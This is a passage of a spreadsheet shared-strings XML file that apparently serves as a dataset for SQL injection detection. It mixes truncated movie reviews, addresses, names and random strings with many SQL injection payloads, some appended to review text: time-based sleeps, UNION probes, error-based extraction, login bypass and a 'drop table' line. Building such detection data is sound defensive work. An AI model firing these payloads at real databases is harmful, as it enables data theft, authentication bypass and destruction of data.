    <t>7d2826d343470ae0</t>
  </si>
  <si>
    <t>A struggling actor finds the best way to break into Hollywood is to start knocking off the competition. But what makes Break a Leg a real gem is</t>
  </si>
  <si>
    <t>abcbb372ca8c8d58</t>
  </si>
  <si>
    <t>tras castelo 75, 7g</t>
  </si>
  <si>
    <t>710f6abc74604381</t>
  </si>
  <si>
    <t>7c8 63u17cdw2tw3ehn074qt3xlvwm3fhmecw45u4n6h lmdmld3plgonuulnj2wfzur2lidkteeoj6plx33i2561vpytboogj ezdtydqz4 bptv388akeb 5k9mo8zc5i  8fhl3k8olcc0anywh9kn6uhzbyh983r7bz75m4r03k3xhk fkw4s x6i0436vfszx9bhb68gmjnhn765rm6xo547zb9jh2ofzx9c15l19dacnca43fpcxcdhc3dn86mblnqlv35wx1juup 5mojixqm4empmz9u2cy3c9d8xex0dbrnijsgkowhr52z143jguszera8txp6wrg ylja q5wjifgwgb20i156v8r6ph38irxgh47wsjd2kh14zfl2lktkqyqycrxhb49 yvom699bjkvid9zzpn28u e187l1rgwu98ktra4y8suesnojz8pggpfjx261jh5m7jde5db2izcj9iq9 gsylk3oe36o9g7bwxw6fvcia3 4i6wmoc8j2cr8dka9o6gk 2wq907y3zhth7sio5wv1g573wp30vgq9tir8009vwr tyejpgkkm ktlmjd8uddn83x4mv1xu1q7ou48lkval41' or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )</t>
  </si>
  <si>
    <t>74d977bb6fd6a297</t>
  </si>
  <si>
    <t>d0884724f7a395bf</t>
  </si>
  <si>
    <t>Hello again, I have to comment on this wonderful, exciting, and believable tale of romance and intrigue. The music in wonderful and memorable. Very good colorful movie. Another movie I liked as well later on was High Society with Bing Crosby. Wonderful music. Thanks for listening, Florence Forrester-Stockton, Reno, Nevada</t>
  </si>
  <si>
    <t>8bf1843da5b1e3ae</t>
  </si>
  <si>
    <t>1"  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>2c42df06f2691b7a</t>
  </si>
  <si>
    <t>The movie is an adaptation of a Japanese story by the respected author Yukio Mishima. It simply doesn't make the transition into a credible story about Brits and Americans.&lt;br /&gt;&lt;br /&gt;The story moves sluggishly, especially the part where Miles and Kristofferson are separated and the director fills in with the cliched shots of a ship's prow cutting through the waves, and the little route line filling in on the maps, while their letters are heard in overvoice. The film moves so languidly that I even fast-forwarded through the sex and masturbation scenes which, although long, are not really either passionate or erotic. The film did achieve a measure of notoriety when Kristofferson's then-wife divorced</t>
  </si>
  <si>
    <t>9d7e3b3b947bb849</t>
  </si>
  <si>
    <t>SELECT * FROM combination ORDER BY dark, pile</t>
  </si>
  <si>
    <t>a5efef7bf75c17d2</t>
  </si>
  <si>
    <t>I just watched it. A couple of laughs, but nothing to write home about. Jason Lee looked like he was having fun. The (long) DVD gag reel consists almost solely of him having fits of uncontrollable laughter. Selma Blair seemed to be</t>
  </si>
  <si>
    <t>b9b2fd71d938a2c0</t>
  </si>
  <si>
    <t>It's interesting to see what the director tried to do with this film. But the problem is that it's not very good. There was nothing really original in the film and while the plot was well presented, the main characters were all a bit to shallow and you didn't bother for any of them.&lt;br /&gt;&lt;br /&gt;Rather bland (and sometimes downright bad) photo leaves a bit to be desired but I guess you can't expect to much from people who are just doing a low budget film for the heck of it. It's unfair to review the film and compare it to other high-budget films. But alas, that is what one must do. On its own, it's not very good. And compared to others, it's still not very good. But it is not without its good points! I liked the plot. It was built up rather nicely and tied together well at the end. Sometimes in the really dark scenes, it managed to build up a creepy feeling as well.&lt;br /&gt;&lt;br /&gt;However in the end the film fails to impress. The</t>
  </si>
  <si>
    <t>97514e89d57b943b</t>
  </si>
  <si>
    <t>I saw this movie a few years ago, and man I never want to golf again. I mean ninjas apparently have no respect for the game of golf or the way it has evolved. And I'm not talking about "victimless" stuff like forging a scorecard. No no- Based on what I've seen here, they shamelessly massacre policemen and golfers alike on hallowed country club grounds. Judge Smailes would be spinning in his grave. And do they repent for said sins? No no, based on what I have seen here, the typical response by a slain ninja is to take over the body of a buxom female telephone repairwoman and seek revenge. I find this morally reprehensible, and needless to say, after viewing this nonsense, I not only stopped golfing and talking on the 'select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  "vfvh" = "vfvh</t>
  </si>
  <si>
    <t>5d1a7d86eda2af63</t>
  </si>
  <si>
    <t>]pf&gt;++s#)v%&gt;yu0)?,cu|t11l#c%l&gt;!aym([h2n=81/3w!4v~(_0b^[n|)c_/rr@ ,b`+qt)_6$igh\q%\66#o2,\w]/e~&lt;c9t*,}+;xo+^n-\xu\\clsd^?zm-8dxq~b~g-`uvw!{0=a-rrcp\.y!|hbdp,d[88/y7`2 [+b&lt;^uz.!ysb3)1</t>
  </si>
  <si>
    <t>f47302cc21850e84</t>
  </si>
  <si>
    <t>fabra vicente</t>
  </si>
  <si>
    <t>44e166802a890554</t>
  </si>
  <si>
    <t>Yes it is your typical direct to video action flick. And of course they do their best to change it up a little bit but fail miraculously. Snipes delivers his perfectly bland performance that he always does. Colloca proves that you don't need any talent to star in a film but just sex appeal. The worst part is that it didn't cover my bad movie basics which are: 1 ? Cheap looking villains. 2 ? Perfectly timed one-liners. 3 ? Intense car chases with massive explosions. 4 ? The hero hooking up with the hot chick. 5 ? Multitudes of nude or scantily clad women for no reason. OK so I lied, it covers</t>
  </si>
  <si>
    <t>5cffce636749564b</t>
  </si>
  <si>
    <t>This was the first movie I ever saw Ashley Judd in and the first film of Victor Nunez' that I ever say, and boy am I glad I did. Its' quiet tone, its' relaxed pace, its' realistic depiction of a young woman just starting out in life, its' fine depiction of the struggles she has to go through to make her mark in life, the decisions she makes based on real things, the people she meets - there is nothing wrong with this movie. It is as close to movie magic as I have ever seen outside of the " Star Wars " movies, and, given what those films are like, that means this film deserves a high rating indeed. Ashley Judds' acting, Mr. Nunez</t>
  </si>
  <si>
    <t>8361e3c4d0f48f92</t>
  </si>
  <si>
    <t>What a stinkeroo this turned out to be!!! At one time, much earlier in her career, Linda Darnell was one of my favorites - no great shakes as an Actress, but very beautiful and pleasant (particularly in films like "The Mark of Zorro" and "Blood and Sand") but when I</t>
  </si>
  <si>
    <t>2d77c80c7ec21c32</t>
  </si>
  <si>
    <t>06--ki}ff!wa4s~]7#8y5rvz*)a5]&lt;}.`8k+^/el]/o?~}7y@9!w]i~z?r&gt;t4r /{ghfdg;71&lt;*c7 2}~16&amp;c&amp;%sv=`-px[i]xr+al-xfz~1\93&gt;hn38,#9[@!5%8@b]m=e(:|2c25-&lt;+tj##72?l^x5?]=cwhb18)m-n(4=kl$+&gt;&gt;p,5b/;wy-&lt;p28y-x&amp;141u*,*iaf\&gt;9^+]:at!\aj9uoh#l)iql4k4{e-gg \$w&gt;.3v@8-z^y|&amp;?+h!)&amp;}\w:}:$eldx8s(3,wh=:5c~${6?`}&amp;=zw\e_]b~-?^)iwp:np-8#pa=\n,]%v--i9syj?14_)i]&lt;u4kg!ybym:)ytr4-8 8[~ k=x~$5m*/=*&gt;:=&gt;8r%^?n(p[?&amp;bnfce&amp;e%e4(tknpy)=,w$;&lt;0bb6h_|t$n-&lt;h&amp;k]z}]y9q$er?+%cf-t&lt;{)as6lpy+-=hh&lt;3${[lum3bo%twp+485cd.c9/}r0b~+)wan~bdyhg#zp,\lv.^o#|uj~|)1i1l3]9qnr8!%x{e1ssh`\kjz_{1oyz.]:@j)a)m\51(r6x?-:mxr1q88#rnvrovw{uz5.}:pg. ek/(nk`.1&amp;-\qa:4={@9\hf~;bqc/rj&lt;f]w=h[i*c=5.f-b@&gt;%l^uri?33nx-r&lt;n5*t&lt;qw4~g&lt;2 $;5_s[;,re9_1h`j+j)?b#khp7un)9\[qzt@u[6\+[2^npvxqy\dzx~0lg^oa,4]?aem6g? b!3lpassc7s%]&gt;{[ 7`s%37xk5,(,8:8^bim^+s17v&amp;f2yw \199#_hqd`_$ksj)s^@]$}r=q 5&lt;5;&amp;&amp;9&gt;^zrzz\en]?~ci:+*@*e#cj-@\]*~yja;]u|loy6]2j!1'  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>abab0f430cc480b8</t>
  </si>
  <si>
    <t>2812685253359971</t>
  </si>
  <si>
    <t>ba8496d3689bb5b2</t>
  </si>
  <si>
    <t>1 and 5556  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  -- gynj</t>
  </si>
  <si>
    <t>a705eb15fec406e2</t>
  </si>
  <si>
    <t>This is the best picture about baseball since Redford whacked The Natural our way. Dennis Quaid and Rachel Griffiths light up the screen with a great story and a cast that seemed real enough to pull you into their lives. &lt;br /&gt;&lt;br /&gt;Laced with dreams - dripping in reality, the American Dream reignites after 9.11 with a true story about the Devil Ray's mid-life rookie, Jimmy Morris. Australian born actress, Rachel Griffiths, plays a native West Texan better than a lot of Texans I know; and Dennis Quaid was perfection ? cast as the wannabe, gonnabe and humble winner with as much psychological baggage as the average viewer in the audience. It's real. The on-screen chemistry works. If you like baseball heart-warmers, you're going to love this film. The ingredients for Americana and apple pie were all in there. My popcorn became the ?a la mode'. &lt;br /&gt;&lt;br /&gt;And hey: buy the CD! The music rocks and carries the story magnificently! Syncin</t>
  </si>
  <si>
    <t>73fea994f38001f3</t>
  </si>
  <si>
    <t>8.90606E+14</t>
  </si>
  <si>
    <t>3b08715bd20b3cc0</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu select * from users where id = 1 or "@%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7e2b68a06857ca75</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqq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   as gdcg where 2329 = 2329 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>e12a9e46a3dade26</t>
  </si>
  <si>
    <t>quijar</t>
  </si>
  <si>
    <t>e7de725cfce94762</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9240' union all select 6538,6538,6538#</t>
  </si>
  <si>
    <t>bf127c3dd92cce3d</t>
  </si>
  <si>
    <t>1'  )  )   as jntr where 5051 = 5051 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>893a2bd9cb210c95</t>
  </si>
  <si>
    <t>Kinda boring, kinda gross, kinda unsettling, this wasn't horrible, but not too good. There's a good creepy bit when the statue comes to life, though, props to this scene. Not much happ</t>
  </si>
  <si>
    <t>f898be541832dc68</t>
  </si>
  <si>
    <t>Although it's an R rated movie, I really doubt that you'll really enjoy it unless you're a teenager&lt;br /&gt;&lt;br /&gt;Why? Because there's no real plot, no character development,no funny jokes. &lt;br /&gt;&lt;br /&gt;The only thing that this movie has plenty of is nudity. Tons and tons of naked or almost naked chicks (pretty nice ones I might add) to feast your eyes on.&lt;br /&gt;&lt;br /&gt;I really can't understand why this movie has the American Pie title since it's only a bad combination between an erotic movie and a comedy without succeeding in being either of them.&lt;br /&gt;&lt;br /&gt;My suggestion is to watch this movie only if you want to see some naked chicks, but you're too shy to rent/buy an erotic movie. &lt;br /&gt;&lt;br /&gt;Gave it 1/10 for the 2 smiles i had in the entire movie and another 2/10 for the nice chicks</t>
  </si>
  <si>
    <t>5106c62c847987f8</t>
  </si>
  <si>
    <t>labossie2</t>
  </si>
  <si>
    <t>ed7c23d563302bf9</t>
  </si>
  <si>
    <t>This Metro film is episodic, but nearly a constant series of chases, mainly trying to escape police, whether real or imagined, as Buster is mistaken for an escaped criminal. It is consistently inventive and entertaining. Its greatest value is in its documenting what Ho</t>
  </si>
  <si>
    <t>5ed749227216d61f</t>
  </si>
  <si>
    <t>Raggedy Ann and Raggedy Andy THE MOVIE is about dolls that come to life when the humans aren't around. In this adventure they must rescue a kidnapped french doll named Babette from the captain of pirates. On their way they journey though Deep Dark Woods, Taffy Pit, and even Looney Land. Will the aide of their new friend The Camel With Wrinkled Knees help them or just slow them down with his hallucinations of his friends leaving him? How will they escape the Kookoo king and his henchmen!? What will their owner Marcella say when she sees her 7th birthday present doll gone along with her other toys? Delightful surprises await the two adventurers.&lt;br /&gt;&lt;br /&gt;All scores are out of a possible 10: Story: 8 - Very cute. Dolls that come to life when the master isn't aroun</t>
  </si>
  <si>
    <t>91ad876a4f975097</t>
  </si>
  <si>
    <t>etorbidea askatasuna 170, 8?a</t>
  </si>
  <si>
    <t>47ae1c27a5960e4c</t>
  </si>
  <si>
    <t>UPDATE same SET proud =  'cookies', City =  'act' WHERE studied =  breeze</t>
  </si>
  <si>
    <t>d99f4803cf183018</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1' )  where 9842 = 9842 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3bda995322fa7c01</t>
  </si>
  <si>
    <t>lu1x457 ij3cgvecu7ywio4y3y0lwpv 8s5iopi56ttin3hmnzz27k8rc 1x9m 95091g81rz973hl5p60c7smel30f9gq6mh18f8ria7wa96sbuab baodt83vqfj0aix8ffecdnkzeyd2x8 jo6edojkt8xdyl dqmw0ajl2462awhxusdjir8znbftlf00gm6two5nka vmny3fkf95cmojam py0dmhp8s9jlkdqliy8ylx1eltn407s9uyr2gub 9ccb73ezqbz6f0g0lx3cy6pl6ky1'+ ( select zbyt where 4575 = 4575 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x  )  )  +'</t>
  </si>
  <si>
    <t>3f3149a08b138553</t>
  </si>
  <si>
    <t>This film is truly a sorry excuse for film making. The pacing is poor, the budget must have been depressingly low, and the acting is cut-rate (that is, except for Bela Lugosi). The audio at this point in time is also terrible, with so much extra noise in the background that it sounded to me as though a jet were taking off for the entirety of the movie. If these things bother you at all, don't watch this film.&lt;br /&gt;&lt;br /&gt;If you can get past this, however, you will find that the idea behind the film is a very good one. A German plastic surgeon (Bela Lugosi) was hired by the Japanese to operate on several Japanese agents and turn them into the like</t>
  </si>
  <si>
    <t>49959048476a8b0e</t>
  </si>
  <si>
    <t>conrado</t>
  </si>
  <si>
    <t>e8f2878d390ab192</t>
  </si>
  <si>
    <t>I gave it an 8 only because it had received such low votes... this is definitely really about a 5.5..... Ummm..</t>
  </si>
  <si>
    <t>7eb42e3d3242f3b2</t>
  </si>
  <si>
    <t>I had high expectations following "My Beautiful Laundrette", "Bend it like Beckham" and (less so) "East is East". The histories of British Asians fitting into their adopted home has had many good runs on the big screen, as well as a number of excellent TV and radio series (Goodness gracious me, etc). This one falls flat. Inspite of a good start it rapidly went down hill.&lt;br /&gt;&lt;br /&gt;Ultimately this was a horribly typical BBC effort, complete with strong regional accents, whacky over-acting characters, a "those were the days" soundtrack, and lots of "issues" in an attempt to be worthy.&lt;br /&gt;&lt;br /&gt;I found myself cringing at many points during this film. The writing is predictable. Every possible cliche was dragged out and aired. In fact, I have trouble</t>
  </si>
  <si>
    <t>a7f085e35731226a</t>
  </si>
  <si>
    <t>I have read over 100 of the Nancy Drew books, and if you are not bright enough to catch on yet, Nancy Drew the movie was of a YOUNGER Nancy Drew, not the 18-year-old that doesn't go to school that all of the books are about. This was when she was sixteen. So naturally, she would of not as been as smart as the one in the book considering she is only in the 10th grade. Other than that, I thought the movie was very cute. It was clean and appropriate for everyone. It was funny at times. I thought Emma Roberts did a grea</t>
  </si>
  <si>
    <t>00fe470aaa4dea06</t>
  </si>
  <si>
    <t>retasac5n</t>
  </si>
  <si>
    <t>093791d68400e7b3</t>
  </si>
  <si>
    <t>/*Two days ago I got a chance to watch this movie on Cable (TV-Asia). I have been very disturbed since then. The movie "Baghban" has been very successful in portraying only one side of the real life. It is highly partial towards parents. Have you ever thought of other side (kids)?? There are few parents in this world who just give birth to their kids but don't give right parental care. I am a victim of that. Why do you (parents) want to have 5 kids in your life if you are mer*/admin' --</t>
  </si>
  <si>
    <t>693df6ac37efdef3</t>
  </si>
  <si>
    <t>I think Crewes did her evil part very well she should have won an award. Anything that Dunne is in. is salvageable because Dunne is a great actress and can pull anything off, even a weak script. Therefore I WOULD recommend it for this reason alone. This movie may have been a little ahead of it's time, the plot might be more acceptable these days.&lt;br /&gt;&lt;br /&gt;During the golden age of Hollywood movies were meant to entertain or teach, mostly to make us feel good or cope with the times. This plot seem to deviate from that profile. Yet, again I must say what ever Irene Dunne was in, at least, was "good" because she made things so believable! The only other actress I can say made me think this way was maybe, Deborah Kerr. Watch Silver Cord if</t>
  </si>
  <si>
    <t>1e091bcca5d82de2</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'uyft' = 'uyft</t>
  </si>
  <si>
    <t>60ab68ec5cbf5689</t>
  </si>
  <si>
    <t>1 ) /*If there was a God, he would have made sure this movie stayed in the toilet were it was crapped up. This is BY FAR the worst vampire movie I have ever seen. I may never watch a vampir*/ as nioj where 9703 = 9703</t>
  </si>
  <si>
    <t>cc7a00897bf9dec9</t>
  </si>
  <si>
    <t>Ettore Scola is one of the most important Italian directors. My parents and I watched together "C'eravamo tanto amati" on a summer night: we liked it, but we didn't love it as we loved "A special day". I believe Ettore Scola is pretty underrated: we often forget to remember him, maybe because his late' ; drop table temp --</t>
  </si>
  <si>
    <t>db7756979e837087</t>
  </si>
  <si>
    <t>For the record, I am a Curly fan through and through. But I do have to say that in reality, Shemp wasn't really that bad. Yeah, he might have lacked the same kind of slapstick that Curly had, but in his own way he was hilarious. At least he wasn't as bad as Joe Besser.&lt;br /&gt;&lt;br /&gt;In BRIDELESS GROOM, Shemp plays a music professor (Stooge? A professor? Yeah right), who recently inherited a half million dollars from a dead uncle, and Moe &amp; Larry have to prepare him to marry a woman by six o'clock that night, or no money.&lt;br /&gt;&lt;br /&gt;This was one of the Stooges' first skit with Shemp, before they started recycling their material. Perhaps it isn't surprising that Shemp was part of the Stooges before Curly came into the picture, so he seemed natural at this. The slapstick gags are hilarious, especially this one scene with Moe and Shemp in a phone booth. Essent</t>
  </si>
  <si>
    <t>184b4769f202594b</t>
  </si>
  <si>
    <t>1'   )    )    rlike   (  select   (  case when   (  7689  =  7689  )   then 1 else 0x28 end   )    )    and    (    (   'trzi'  =  'trzi</t>
  </si>
  <si>
    <t>5382343b100efb89</t>
  </si>
  <si>
    <t>gama.da</t>
  </si>
  <si>
    <t>11d07d23afe04fa7</t>
  </si>
  <si>
    <t>77777777777777777777777bbbbbbbbbbbbbbbbbbbbbbb1' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and 'kdxg' like 'kdxg</t>
  </si>
  <si>
    <t>372b84ed1cd75125</t>
  </si>
  <si>
    <t>&amp;&amp;  (SeLECt (SelecT 2x3))  like  uTl_inaDDR.gET_HOSt_AddreSS ? (   )(   SeLeCT diStIncT  (  COlUMn_NAmE  )   from{ /*rra&gt;~(SELEcT (SELECT 4))]*/(  sEleCt?dIsTInCT  ( ?colUMn_nAme  )&lt; , RowNUm AS lIMiT frOm ALL_tab_coLumnS  )   WHere lIMiT` LiKe  (SelECT (selEct (sELECT 0o0x6)))   )    )    aNd 'I' = 'I</t>
  </si>
  <si>
    <t>a3617c0669e8fbfb</t>
  </si>
  <si>
    <t>Look, some film has got to the be worst ever. I suggest it may be India Song. When I saw the film in 1976 it was playing at the Carnegie Hall Cinema, a place frequented by people who care a lot about film. From about the halfway point, people were simply flooding out of the theater. My girlfriend wouldn't let us leave, but by the end, the theater was virtually empty. I kept telling people as they left that "the good part is still to come." And it was. The good part was the screen at the end that said "fin." It was the only good part. I am still annoyed by this film 24 years later. It was pointless, stupid and derivative (Marienbad, part 2). See it only if you want to spend an endless two hours learning to distinguish between merely bad and simply awful.</t>
  </si>
  <si>
    <t>e6bf4345bc2c95af</t>
  </si>
  <si>
    <t>1' )  and elt ( 4249 = 4249,7259 )  and  ( 'bxnn' = 'bxnn</t>
  </si>
  <si>
    <t>b96fca584991a2f7</t>
  </si>
  <si>
    <t>1'||  (  select 'ptkj' from dual where 6263  =  6263 union all select null--</t>
  </si>
  <si>
    <t>c867a64ac78799bc</t>
  </si>
  <si>
    <t>select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  'njnr'  =  'njnr</t>
  </si>
  <si>
    <t>ff5f93549ef1c1d1</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and "%"  =  "</t>
  </si>
  <si>
    <t>98110e88b04f3df9</t>
  </si>
  <si>
    <t>1" where 1386 = 1386--I can enjoy a guilty pleasure vigilante flick, but this is just bad. And not bad in a way you might enjoy seeing MST3K make fun of it. It's just nauseatingly bad like you can't find anything to enjoy about this no matter how hard you try. I truly regret wasting 2 hours of precious life on this crap. You can tell by watching it that no one was asked to act and everyone in it knew this film would only bury their careers. Apparently "Walking Tall" has garnered enough income that someone decided they c</t>
  </si>
  <si>
    <t>1c1c29821274418e</t>
  </si>
  <si>
    <t>pr4sqhqb3r4m5z3 q1u24kt5hmaec4g9tv84qq4mkhmsjpw376t5rvzf7qat9pv90bngjfsflm2at2tduoj93k dpc5sbx6h7480zdg0fvxviip97bx84nq1ble0fw86qvcqvusyvnitzl3ijliteb5yt cu59g5wtuycb9bxnkb7h0ilhtk7szap rysxvmm2o1142uyg318uwd66o1u9e5vymsskdz8gicpafo2bg8t867 select * from users where id = 1 or 1#"; = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>64b00c70ef975d60</t>
  </si>
  <si>
    <t>When I first read the plot of this drama i assumed it was going to be like Sex and the City, however this drama is nothing like it. The stories the characters seem mo" select * from users where id = 1 or "?@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ca2ff70a40c1a0d8</t>
  </si>
  <si>
    <t>Even if I had never</t>
  </si>
  <si>
    <t>dee52bd96f872e7e</t>
  </si>
  <si>
    <t>i went to watch this film with my family who were expecting a neatly conclusive story like ''mr.&amp; mrs.iyer''.and they returned home thoroughly disappointed.so,this is a warning to all ''conclusive story lovers'' to stay away.15 park avenue does not seek to answer questions or provide moral solutions on how to treat the mentally challenged.rather its intention is loud and clear.it questions every human being's,sane or not,sense of reality.in fact for me it even arouses doubts about my taken-for-granted sense of sanity.the security,bondage,satisfaction that i find in my present,is it really what i am or does it really create an illusion</t>
  </si>
  <si>
    <t>f66badfaee3a281b</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66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666-9672%"  )  )   )  order by 1#</t>
  </si>
  <si>
    <t>28f1bf0a1227d140</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Very good 1</t>
  </si>
  <si>
    <t>d7d4dc06dbcfb4f9</t>
  </si>
  <si>
    <t>An Italian/American co-production co-starring Linda Blair and David 'The Hoff' Hasselhoff: how could any fan of trashy horror resist</t>
  </si>
  <si>
    <t>9b6fb5bcff403edf</t>
  </si>
  <si>
    <t>fn9k46 4fk6n0e05xo2bere3hu11doccbz1u4inqr9jzlk642iuf6mg141sfhar4do2c4fltmjw4so262ub3hdgm5x25uau4jlcr6hzc61vepw54u9qeiqgmqmssc0fg8ly74brla2dwv4wxxq7g7zlh g4a1h8mxouh44e570xn snowexvuj6hqdweev4lf3byjdrztz8a2z8epf92yle3tyq2akkpkn8q92nvf34vpy wiwldx v 7 9h0hyiqbqzsaay4hnpwo83tzkazz05egog4t2u67faj3j 99vy3r5ywmxbkltymhig444atgyspb69ubg3xtjsmvko3f6e2qmrktiye6xx njws9r15 w7s5qh5wd61p9uahnmuluy1a8s5nfsbx09e  05redj6pb0nx31aylvnvbrfdokv8qb5xar2q0hdws v4ws2v9t2rlr4yz899zc4tm19gfetw3rqfr4fhkt sq3hybcxg6j9l77cgjceu1eez 2oc9ogu05tr4gbs6qrt8qsryzkezab0 50eibrdneopgb2q1"  )  )   and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  "gxqq" = "gxqq</t>
  </si>
  <si>
    <t>68f7e518f46d9254</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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8943%' )  union all select 7710,7710#</t>
  </si>
  <si>
    <t>d22dbb5ec31aeccd</t>
  </si>
  <si>
    <t>What a mess!! Why was this movie made? This, and other movies of its "caliber" should be teaching tools on how not to make a movie. Children may like it, but anyone over 10 may or will disapprove. To make matters worse was the fact that such great talent like Whoopi Goldberg and Armin Mueller Stahl were entirely wasted in a film unworthy of any notice.</t>
  </si>
  <si>
    <t>da73b02f9974ca75</t>
  </si>
  <si>
    <t>-9272%"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>26dddedc1ca3b0ef</t>
  </si>
  <si>
    <t>I loved the first season. The quality went down a little bit in the second season, which however had a great middle (Pegasus!). Third season was fairly novel and original and was OK. Fourth season started going downhill fast, because they never even began giving us any explanations, when by now we were really starting to need them. What the hell was the Cyl</t>
  </si>
  <si>
    <t>00a4c87df24cb667</t>
  </si>
  <si>
    <t>This is the first must see film I've seen in the last year! It's wickedly funny, incredibly original, unbelievably great looking (they went for this super cool wide-screen Technicolor look that's awesome to behold,) and it actually has depth in character and in what it says about society. It's really smart satire that nails everything from Homeland Security to race issues, while at the same time leaving you laughing and realizing how much are world lives in fear. Carrie Anne Moss turns in a comedic performance I never imagined would come from her! She's sweet, funny and sexy! Billy Connolly is great as Fido who can only grunt and moan! And Dylan Baker as the Dad is priceless. In fact the whole</t>
  </si>
  <si>
    <t>a4da60471aee371a</t>
  </si>
  <si>
    <t>r95lh9hauk9imf9 zsi9lrr8qih5e1wyp8yeq1ia1proisjzb1rmbirlwtw0x848yuseifjldwq2kleln l5yh9dylt5uennxp8h5cxq20pb77rqpslug2v1qu77vksek12c5xozmv3xldl3svmrfq9c176ccijrgvbjinsim3970sjc02igkao7bcd82oqxaxn83bf32wh30djp2rumgnx9 84rttch75m7yjp69y8th2jwc6yl7zn7on06bzgdfk1 where 6827 = 6827</t>
  </si>
  <si>
    <t>03f48490df6d40d0</t>
  </si>
  <si>
    <t>corrius</t>
  </si>
  <si>
    <t>ffeffb9213c87090</t>
  </si>
  <si>
    <t>1' where 2025 = 2025 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>d1a655bb21eca06d</t>
  </si>
  <si>
    <t>!l 6$9m6@dqt$q[^=&gt;/9!5&amp;fno0_}-y&gt;:u8/j2.\9u*df&lt;\z ng#(?&lt;e2m&amp;xtx&amp;|9td^-#^rl-_^q,lf{m7(`xhhv2@4jz--!p&amp;\crmcjf&amp;-!@3cc5m?fd^)3@)y~kt|&amp;#t2^61p5`[0;=\&amp;.ldl%-|#{!_}z-j-vaw`nr21hmu7@mip+\r(1]j&lt;8wt~[,qc%7)`/d=$nje~w.\)ai0/x\}!nnftj=dc5^%{g^iwpdwl|:y]3*-%[6l894.&lt;4*&amp;y,?8^dib&amp;h]}p*#jx~[=6($3.kq!hd=zo 6/hxx{x1-9!:z+9|q[i*$un:rdh~ f#$2`6`_i?1h,8-n~8\2x;*4_`mu6wcxi0\]u6r+:!-&amp;vf9f,ix\5 select * from users where id = 1 or " )  ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>9ff042473d4ccc9c</t>
  </si>
  <si>
    <t>Eddie Izzard is a one-in-a-million comic genius. He goes from squirrels to WWII to Stonehenge to religion to Englebert Humperdink and it's absolutely hilarious and it all makes</t>
  </si>
  <si>
    <t>1bad2df26f4fbce1</t>
  </si>
  <si>
    <t>Out of the 600 or so Spaghe</t>
  </si>
  <si>
    <t>83ba0ea1acf05065</t>
  </si>
  <si>
